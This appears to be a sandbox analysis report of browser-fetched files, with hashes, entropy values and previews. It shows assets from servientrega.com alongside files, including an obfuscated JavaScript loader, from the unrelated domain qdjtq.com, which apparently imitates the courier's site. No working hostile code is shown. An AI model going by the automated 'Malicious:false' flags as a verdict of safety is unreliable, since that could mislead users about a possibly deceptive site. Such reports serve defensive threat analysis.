            Malicious:false
            Reputation:low
            URL:https://fonts.googleapis.com/css2?family=Lexend:wght@300;400;500;600;700&display=swap
            Preview:/* vietnamese */.@font-face {. font-family: 'Lexend';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lexend/v19/wlpwgwvFAVdoq2_v9KQU4Wc.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Lexend';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lexend/v19/wlpwgwvFAVdoq2_v9aQU4Wc.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lexend';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lexend/v19/wlpwgwvFAVdoq2_v-6QU.woff2) format('woff2');. unicode-range: U+0000-00FF, U+013
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):10409
            Entropy (8bit):4.168738315809581
            Encrypted:false
            SSDEEP:192:gTmKImxGgWXCHGq91oLJ4dmBfLKnxKwKtx5RiTq:gTemxGgWyHniJ4wBjKxdqf
            MD5:C9431F464D2C18B06E2BAC6CAB90E6CC
            SHA1:D51543C649347A27CB91EF56B84BC10EB4C4DC1A
            SHA-256:1E782C52411F41C02095854A610827BA2989E90D95D878C683D32EAE6F4A9AE4
            SHA-512:5F340BEBB6DA879FB1D960341251EFA4BB256441B64A112A268B80911A343E58D1B7031A574A719E0423AC8A87D9366FC176F7515A9D706184AEBE89681BA268
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 30</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-376.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-30" transform="translate(290.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(1.000000, 2.893769)">. <path d="M27.9076983,2.98076217 C27.814557,3.12742011 27.6820671,3.24727504 27.5117229,3.3231326 C27.4927958,3.33172979 27.4743668,3.34184413 27.4564358,3.35246418 C27.4365125,3.35853279 27.4170873,3.36510711 27.3976621,3.3737043 L2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 796, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):450585
            Entropy (8bit):7.992637641827088
            Encrypted:true
            SSDEEP:12288:GRBBXS1YVxDHvFti6+4oAc34VyvfjpQPDn1Y:Cq1Y7DPFtilHIgC7y
            MD5:941FC6F010B2AE336378E25230EF30E0
            SHA1:E247DFA067B7F495791E68C8A3FC705ED075FC13
            SHA-256:4C719CBE55BF3380DEEE3A44BB1C561AC90896426F28DE0E5EC301D7F110C9CF
            SHA-512:DDE463526AAF32B804BBB6C041B9255F417CA2DBB393581E62B968312DDF1F7130B8C5B10450AE1F4EE0CF582EC819DE0BF97CF312F392CD9735594B7E99ED0F
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port3-m.png
            Preview:.PNG........IHDR....................pHYs.................sRGB.........gAMA......a....IDATx.....mGu...:..W#...$F!.. .3. ......&.m7.|m..8?;.I..y$.u../_..t'.q...K......0.z...4O..I.....w.j.j...s......O..uj\..V.V..w..f..E..-Z.h1..^.|.w.8.^.|..C....:..x-Z.hA......7..p........{\....3.y.(h.E..-F.m......S1..g..H.z......[)9<t...s..>.g.1...'.....~.<.."....:.P<......;.p.....4^..3R.=Dp}L.wRz.._i....;....v..u...8.Fh.K......j.8...... ./#y...fHyp...:.}E.%.{.......q.=n........P...b.[..-Z.h.b.D.N 2..8.|.x.r.E...B|;&....=B.S.oN...<C..e....2N.=O..}./<ry.....r&...x4..}.w..p...\.$..P..A.N..A..|(T.......g..H%|.^.i.N.NLV...8.mH...G"...D......H..6.{?q..j.ZEa.}G.4/L.......<....}...*.....m.{?o.l7a~q.&...r}.[..o........a...t7v..-Z..Dmx..z$U..s.0._{.@&..e.&..P2N..u....m.H........"..b.....Z.!R..g....#DHx.}..[....W.B.Z..9..f.i!............hkf~...........|.'.%.....S.........l.u..1.....5^..Qw..B$...S........au.|'Z.h...". ....^#..p^..2L#.PE...4.....P/....}z..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows icon resource - 1 icon, 96x96, 32 bits/pixel
            Category:dropped
            Size (bytes):38078
            Entropy (8bit):5.659515181584008
            Encrypted:false
            SSDEEP:768:2439j78bGLLLLLLLLL4LLLLLAIXSSSSSS+G47qgQuQ/cccccccccccccccccRcbH:2iJFG2qNL/cccccccccccccccccRcbc6
            MD5:F264619A74D8B662E7A695C2563A9BCF
            SHA1:5A204AA829B002B177210B8A0112A1B1412FDA29
            SHA-256:309EE1AEA13A5C6A63F0689D70476FEBB5771B3209D6779B5B97D3CBDB76525E
            SHA-512:217C23F33C789FC1D2DFD4E60DF5F4BF988474A25F63A63A058267F557C76C37A30C4DFFCF2A64521DA3E679D1E30A3EDBB9BFC8681264D00A31F12883C3327A
            Malicious:false
            Reputation:low
            Preview:......``.... .........(...`......... ...................................................................................................................................................................................................................................................................|...TEEE+........................................................................................................................................---...............................................................................................................................................................................................................................................................V777.........................................................................................................................---.........^.#.>...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):25821
            Entropy (8bit):4.40402848184812
            Encrypted:false
            SSDEEP:192:Lrh963ROda6jjEi/rGewdt7yM6eJe/ahXi/OGen3Qrdn/vRni/YGeRkt7aK6e5ep:nh9mOM6nseMhb3e9RVVU73TAd
            MD5:0462C275036497B098EBF1024AFDA963
            SHA1:CBF50789EBB5468D18E3A00C8026088E8DF1FEA2
            SHA-256:8F1F0A6BB665FA3AB90141CCCD52C27299D353DAA4CD6F2AD9358C145D314D91
            SHA-512:F85547BFA5CB197BDCDD46E441F74C4277BE8E6B0A9AD5E715E810DB2D5F8F1821F632D0FE44FB99DC8A85400F20F3F17BBBC3A58565D0C872584AA8105CA273
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="united-states">.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.76764 0 1.71464L0 13.2853C0 14.2323 0.771174 15 1.72253 15L21.2775 15C22.2288 15 23 14.2323 23 13.2853L23 1.71464C23 0.76764 22.2288 0 21.2775 0Z" transform="translate(0 4.4716053E-05)" id="Path" fill="#F5F5F5" stroke="none" />.. <g id="Group" transform="translate(0 4.4716053E-05)">.. <path d="M0 1.15385L22.8105 1.15385C22.5771 0.482352 21.9367 0 21.1827 0L1.62779 0C0.87382 0 0.233459 0.482352 0 1.15385Z" transform="translate(0.094740234 0)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 4.6153226)" id="Rectangle" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 2.3075273)" id="Rectangle" fill=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1257
            Entropy (8bit):4.845241911960573
            Encrypted:false
            SSDEEP:24:2d1bqE1L6/6gxTVafAdeaxM2LiUaNgGXo0NAPJIho0NAfNIho0NAk3Ig:cVqEV6SNPUsgo
            MD5:B964C0CA91B34049D7A880BEDEF08351
            SHA1:CBCC614ED18814D304320C57AC2A714623FF5543
            SHA-256:427365A3789A7E14C09B866482793263E4512643FD351E5B46635C9C81C04688
            SHA-512:4C00C688D45337EA1EC52F64917B777028DC7BE34B648E24616F53A44BF1B24ADCB1A68A28B5C1D7DC5AE7EA18748DA7C9AC6EE7E59A99860719AB9D1C69E4D0
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="3px" height="11px" viewBox="0 0 3 11" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Icon/more</title>. <defs>. <filter color-interpolation-filters="auto" id="filter-1">. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 1.000000 0"></feColorMatrix>. </filter>. </defs>. <g id="Symbols" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Header" transform="translate(-1312.000000, -13.000000)">. <g id="more" transform="translate(1312.000000, 13.000000)" filter="url(#filter-1)">. <g>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="1.26527565" rx="1.04166667" ry="1.26527565"></ellipse>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="5.12295191" r
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65327)
            Category:dropped
            Size (bytes):70475
            Entropy (8bit):5.380996746038723
            Encrypted:false
            SSDEEP:1536:ZKblURHpp4V2JLxcbvM/9mU7C7Az6v0j861:ZmlgJpEvM/9D9z6cI61
            MD5:48BB5C8A01043ECEAF45E65D5C98950B
            SHA1:4603360883DD66F7254CD5DB17777748226DC657
            SHA-256:77080938572095BDDC311784E1C284E7CD12268F46946AFF94D04A43A53DFFC9
            SHA-512:3A03DD060953E790E8ECB40DBE64F2CE4980DAE93433209C40C56910231663660306FE5FCD3D8D3041CC2BAECACA1E3DB1E5C27C39B1A23381D633CA432992DD
            Malicious:false
            Reputation:low
            Preview:/*! For license information please see project.js.LICENSE.txt */.!function(){"use strict";var t={}.toString,e=function(e){return t.call(e).slice(8,-1)},r=Array.isArray||function(t){return"Array"==e(t)},n=function(t){return"object"==typeof t?null!==t:"function"==typeof t},i=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t},o=function(t){return Object(i(t))},s=Math.ceil,a=Math.floor,u=function(t){return isNaN(t=+t)?0:(t>0?a:s)(t)},c=Math.min,l=function(t){return t>0?c(u(t),9007199254740991):0},f=function(t,e){if(!n(t))return t;var r,i;if(e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;if("function"==typeof(r=t.valueOf)&&!n(i=r.call(t)))return i;if(!e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;throw TypeError("Can't convert object to primitive value")},d=function(t){try{return!!t()}catch(t){return!0}},h=!d((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})),p="object"==typeof window&&window&&window.Ma
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65299)
            Category:downloaded
            Size (bytes):78468
            Entropy (8bit):5.187569108119828
            Encrypted:false
            SSDEEP:1536:itAs7TPR2t4qqDMi/GgSe7hyuvsnKjIx8L0Sem49MVcUzW:Yx/XIe0Sem49d
            MD5:715756E65B9FF107F4CF927E3E8BBF76
            SHA1:F52210379974496514E24AEB07ECB6EF259063F6
            SHA-256:2AEBC2552D7DADF4E3A0B80CC830C274E91146584DAD8E29B04338B9ECEDB363
            SHA-512:3EA45E95A2465D5B90F3537AC2352B4507A508347BCFC46F286891F526D2C4A1CF22DD797890E6215BFD109830AB45EF83296CCEC8F3BD0D3E5722365AD22C85
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/bootstrap.bundle.min.js
            Preview:/*!. * Bootstrap v5.1.0 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i="#"+i.split("#")[1]),e=i&&"#"!==i?i.trim():null}return e},e=e=>{const i=t(e);return i&&document.querySelector(i)?i:null},i=e=>{const i=t(e);return i?document.querySelector(i):null},n=t=>{t.dispatchEvent(new Event("transitionend"))},s=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),o=t=>s(t)?t.jquery?t[0]
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (59873), with no line terminators
            Category:downloaded
            Size (bytes):115770
            Entropy (8bit):5.542103538297206
            Encrypted:false
            SSDEEP:3072:xQDlseA9UmVbTdBdrcUvKtwk5Zdyx9C+dIiNj/OL1GdAMgs:xQDVA9UYPoUvcwIZdy7CwIit/OL1Gzgs
            MD5:3056CE77AFF2B16B3FBAE68878931617
            SHA1:A7510A42D6D703834819412347CBAF66F95C8822
            SHA-256:BD60085792C981360EA73E88D5DBA367137421177B3BC9AC02BF3947442BA378
            SHA-512:7CDFEE3AA6B5B8C5DEEF55EAB749AC8C0D15C01A241E435BF3A48CCAB2A8BE46F4E6A973F6CB4CA8D27B66AD892EE7DB4DE2025F5C2FAAED0A32D3FB74FA72B3
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/63d4f0c9ajMSD.js
            Preview:var a18_0x285282=a18_0x9666;(function(_0x1b38c6,_0x5e1e48){var _0x3986b0=a18_0x9666,_0x548164=_0x1b38c6();while(!![]){try{var _0x1d9a6b=-parseInt(_0x3986b0(0x61e))/0x1+parseInt(_0x3986b0(0x2f1))/0x2+parseInt(_0x3986b0(0x5f7))/0x3*(parseInt(_0x3986b0(0x3cc))/0x4)+parseInt(_0x3986b0(0x525))/0x5*(parseInt(_0x3986b0(0x2ff))/0x6)+-parseInt(_0x3986b0(0x247))/0x7*(-parseInt(_0x3986b0(0x5ee))/0x8)+-parseInt(_0x3986b0(0x434))/0x9+-parseInt(_0x3986b0(0x5fd))/0xa;if(_0x1d9a6b===_0x5e1e48)break;else _0x548164['push'](_0x548164['shift']());}catch(_0x1153e5){_0x548164['push'](_0x548164['shift']());}}}(a18_0x4b5c,0xaf7b1));var a18_0x4fcab0=(function(){var _0x4c567f=!![];return function(_0x206ecd,_0x3a4a2e){var _0x228a30=_0x4c567f?function(){if(_0x3a4a2e){var _0x57da66=_0x3a4a2e['apply'](_0x206ecd,arguments);return _0x3a4a2e=null,_0x57da66;}}:function(){};return _0x4c567f=![],_0x228a30;};}()),a18_0x13398b=a18_0x4fcab0(this,function(){var _0x262b96=a18_0x9666;return a18_0x13398b[_0x262b96(0x394)]()[_0x
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:downloaded
            Size (bytes):206220
            Entropy (8bit):5.191219766479253
            Encrypted:false
            SSDEEP:6144:nz3IAqm4BkZBwG1RASkMDs3Uyp5CrWeu0GTI1V:nDIAJ4iZBwG1RASkMDs3Uyp5CrWeu0GA
            MD5:C1EB2AD009F48FBAF7CD26E1DDCC25B7
            SHA1:12FE29F68AE495AE571181D0BCC1332B1E2A2C45
            SHA-256:E1242AADC6CB1A3C8AB7F9337CD72683EED41ACBB0E2B1CC2F61B887ED335CBF
            SHA-512:23B81680172B7575A9108FB9AD586A0AD6BB3B1907B834A4E2CAA9F2394E90DE43F832AD753816692F9F68236D0C8431829C9736A1F521F55D087B322787F844
            Malicious:false
            Reputation:low
            URL:https://mobile.servientrega.com/WebSitePortal/assets/css/plug.min.css
            Preview:dfn,em{font-style:italic}img,legend{border:0}legend,ul{padding:0}.fade-in,ul.staggered-list li{opacity:0}.pagination li,table.centered tbody tr td,table.centered thead tr th{text-align:center}.picker__table,table{border-collapse:collapse;border-spacing:0}.clearfix,.row .row.collapse:after,.row .row:after,.row:after,.toast,[class*=block-grid-]:after{clear:both}.btn,.btn-flat,.btn-large,.owl-carousel,.owl-carousel .owl-item,.owl-theme .owl-controls,.waves-effect,a{-webkit-tap-highlight-color:transparent}.btn,.btn-large,a{text-decoration:none}.fa,.hvr-push,.hvr-rectangle-out{-moz-osx-font-smoothing:grayscale}.ng-cloak,.ng-hide:not(.ng-hide-animate),.x-ng-cloak,[data-ng-cloak],[ng-cloak],[ng\:cloak],[x-ng-cloak]{display:none!important}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,ng\:form,section,summary{display:block}.ng-animate-shim{visibility:hidden}.ng-anchor{position:absolute}.materialize-red{background-color:#e51c23!important}.materialize-red-text{color:#
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):559
            Entropy (8bit):5.390602373716871
            Encrypted:false
            SSDEEP:12:GHxmMmXumOfN/65HgKPVaWAYmRWQkWk6x/XbmSuLEAx70n3rEo+:GHxFcun565HgKPVfVmRWvWkhELgj
            MD5:15E48A72ACC9ADC6F4AAE13A5295BA35
            SHA1:0DA5F9D7E9D80C7F881BB18C51495A8B13286FAF
            SHA-256:2DBDCC90383AA0C9419D784B069D6B814BD663102C019304C410E9C32AD23951
            SHA-512:484FB554EA8802511F80183EDA4B4480E50A9613B5DE75A6104817E4BF89E37D3DB6162D4E35EE2CE6170714ABE8AC702B749F067A70F22A44E0630A3D7EE281
            Malicious:false
            Reputation:low
            URL:https://sth0d7m9clo4y72mjm8vh3.s.decidata.tv/sth0d7m9clo4y72mjm8vh3.js
            Preview:;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[];.p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments).};p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[0];n.async=1;.n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,"script","//sth0d7m9clo4y72mjm8vh3.s.decidata.tv/v3.7.0.js","snowplow"));. .snowplow("newTracker", "sp", "sth0d7m9clo4y72mjm8vh3.t.decidata.tv", {. appId: "sth0d7m9clo4y72mjm8vh3",. discoverRootDomain: !0,.});..snowplow("trackPageView");
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):3857
            Entropy (8bit):4.5794716462664375
            Encrypted:false
            SSDEEP:96:xH/UhQQqOcGPFVAduL8UY/2rBHxY7XcXyicxAthTD+65w:tRgJFY/2rBxYTmyGCb
            MD5:DA43438BED46DFC10A9800655577228D
            SHA1:65EB7A45B4B0A62E53970EAC81096A275C5C4D70
            SHA-256:692AD46320BE0ABCB5805CB3032F22B21DACE9EE1DC5819CA6184D5EA6672201
            SHA-512:B3FF64B712F976F3530F0BCB1BF30B8E544A64BFCC195EEA76643207B7FB30279146E39914B95A2A8EE1F843D57519F0EAB298178DAC836A7A6BFF49E4A5493E
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-ins.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.777364" y1="0.086554565" x2="0.07414896" y2="1" id="gradient_1">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. <linearGradient x1="1.5520687" y1="-0.6829178" x2="0.07414896" y2="1" id="gradient_2">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. </defs>.. <g id="instagram-(3)" opacity="0.90000004">.. <path d="M22.9415 6.76208C22.8877 5.54 22.69 4.69983 22.4068 3.97181C22.1147 3.19904 21.6653 2.50717 21.0766 1.93202C20.5013 1.34792 19.8047 0.894053 19.0408 0.606566C18.3084 0.323467 17.4725 0.125841 16.25
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1725
            Entropy (8bit):4.920745464472701
            Encrypted:false
            SSDEEP:24:2dZnmPLOVL/veaxM7JVjXJ4MyMrGRyGijKIG9hKy+Bo2A1RDNAgJQwweU8Db:cZmjOVk3yqqdijKNnKyf2oRtGhLUb
            MD5:C882A3E11B6D09B32F4B72023B6FB2B3
            SHA1:276B936DCBD1B547957F6136016C3930BBAB0E17
            SHA-256:A46300114C6A0A77929B902C43F745942DB3857E3E6B6AD0FAC9997F7DB60E45
            SHA-512:C2549E234CDEF326BB6D6B09AF30B2B9414CC5CE95780837DDB8F62306E1F14B8042B5503253E73899A019DADE6DB201B235C5ED2233F1DFDA96686E1415E832
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 60</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-286.000000, -978.000000)" id="Group-60">.. <g transform="translate(286.000000, 978.000000)">.. <g id="Group-52" fill="#2357FF">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="abstract" transform="translate(17.000000, 14.000000)" fill="#FFFFFF" fill-rule="nonzero">.. <path d="M2.19296,10.9216 L0.00864,10.9216 C0.00864,19.367232 6.854528,26.2144 15.30016,26.2144 L15.30016,24.02976 C8.060736,24.02976 2.19296,18.161024 2.19296,10.9216 Z" id="Path"></path>.. <path d="M15.30016,2.18464 L15.30016,0 C9.267264,0 4.377
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):10409
            Entropy (8bit):4.168738315809581
            Encrypted:false
            SSDEEP:192:gTmKImxGgWXCHGq91oLJ4dmBfLKnxKwKtx5RiTq:gTemxGgWyHniJ4wBjKxdqf
            MD5:C9431F464D2C18B06E2BAC6CAB90E6CC
            SHA1:D51543C649347A27CB91EF56B84BC10EB4C4DC1A
            SHA-256:1E782C52411F41C02095854A610827BA2989E90D95D878C683D32EAE6F4A9AE4
            SHA-512:5F340BEBB6DA879FB1D960341251EFA4BB256441B64A112A268B80911A343E58D1B7031A574A719E0423AC8A87D9366FC176F7515A9D706184AEBE89681BA268
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/57.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 30</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-376.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-30" transform="translate(290.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(1.000000, 2.893769)">. <path d="M27.9076983,2.98076217 C27.814557,3.12742011 27.6820671,3.24727504 27.5117229,3.3231326 C27.4927958,3.33172979 27.4743668,3.34184413 27.4564358,3.35246418 C27.4365125,3.35853279 27.4170873,3.36510711 27.3976621,3.3737043 L2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (7310)
            Category:dropped
            Size (bytes):292294
            Entropy (8bit):5.555664737462885
            Encrypted:false
            SSDEEP:3072:N6ax8eulMYeip6C/00VlXol0FQbQwM87uYL0sSN0LlspOsEemtJeNvZzVDOu8:0pmFuhlq0kd7DhJs8sEemveVzE
            MD5:79E6C323A7EDF5835B5AE44BA1A09F28
            SHA1:597522DED49ABF2F1C1E4DA8620F15715BDEEB90
            SHA-256:028796012D542C4D5E9F7B87F25BD3741C0D8DAC947FF142F190ADF1F4F07B01
            SHA-512:F529B7E80E1937687E378CC83BDF20044218A8359B1D9FB4D517712197BAE3827A5CB271C33D2F50A4AE7293728323FD23A438F6D5AFA6D869A7080FECA287F4
            Malicious:false
            Reputation:low
            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"36",. . "macros":[{"function":"__e"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-25318717-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__d","vtp_elementId":"boton","vtp_selectorType":"ID"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":fals
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1836
            Entropy (8bit):4.696338008769207
            Encrypted:false
            SSDEEP:48:4uMdxhxmac2Z1i3KqgHs1FK2WSmAA89863AyI1i:GdxOnZCH8T98sAyIk
            MD5:81279E22C8ECE9E1D0536A402484DAA3
            SHA1:911797507FB12D4F451D5900E32DB96AD697C401
            SHA-256:5C6237178E88AB7F1C6E26C9E99547E58782450B8F2A182129448FF4D99E89AB
            SHA-512:4B510D6CE8A76B4FB3CFF4019AE56DE39E22B2F53B13BA5DD27BEFC0251B468FFB6D7547CAC66654F8FAA7F2413D0E2A1667C5A11BD36FCD312731D0C0C0BE6C
            Malicious:false
            Reputation:low
            Preview:/*.. * Bootstrap Cookie Alert by Wruczek.. * https://github.com/Wruczek/Bootstrap-Cookie-Alert.. * Released under MIT license.. */..(function () {.. "use strict";.... var cookieAlert = document.querySelector(".cookiealert");.. var acceptCookies = document.querySelector(".acceptcookies");.... if (!cookieAlert) {.. return;.. }.... cookieAlert.offsetHeight; // Force browser to trigger reflow (https://stackoverflow.com/a/39451131).... // Show the alert if we cant find the "acceptCookies" cookie.. if (!getCookie("acceptCookies")) {.. cookieAlert.classList.add("show");.. }.... // When clicking on the agree button, create a 1 year.. // cookie to remember user's choice and close the banner.. acceptCookies.addEventListener("click", function () {.. setCookie("acceptCookies", true, 365);.. cookieAlert.classList.remove("show");.... // dispatch the accept event.. window.dispatchEvent(new Event("cookieAlertAccept")).. })
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (9217)
            Category:dropped
            Size (bytes):231356
            Entropy (8bit):5.458115913562013
            Encrypted:false
            SSDEEP:3072:MfLeYq8At6Jc37OeR8NteGvQ+AMPpgArl0xYu5s713d+:MfLeYZ+6JEH8N7QQGArHu5s713M
            MD5:B7DBAB5C73AE17725BCE0368460F1366
            SHA1:84C6B0316DDC3CC17897FD95F18BA6059166113D
            SHA-256:979D977217C7032B1CD864C0B65CE5D4FF834AA9CA116198873299B5A60CFC9A
            SHA-512:570718F92E8DCB94F348C9162D5CA0619C1CC902D5336B3D702DEFC47AB12C0F4C722D471880F6DF2CA4BFF2539F1A2DC0B71B874CDF13D75A5D8C32F5283750
            Malicious:false
            Reputation:low
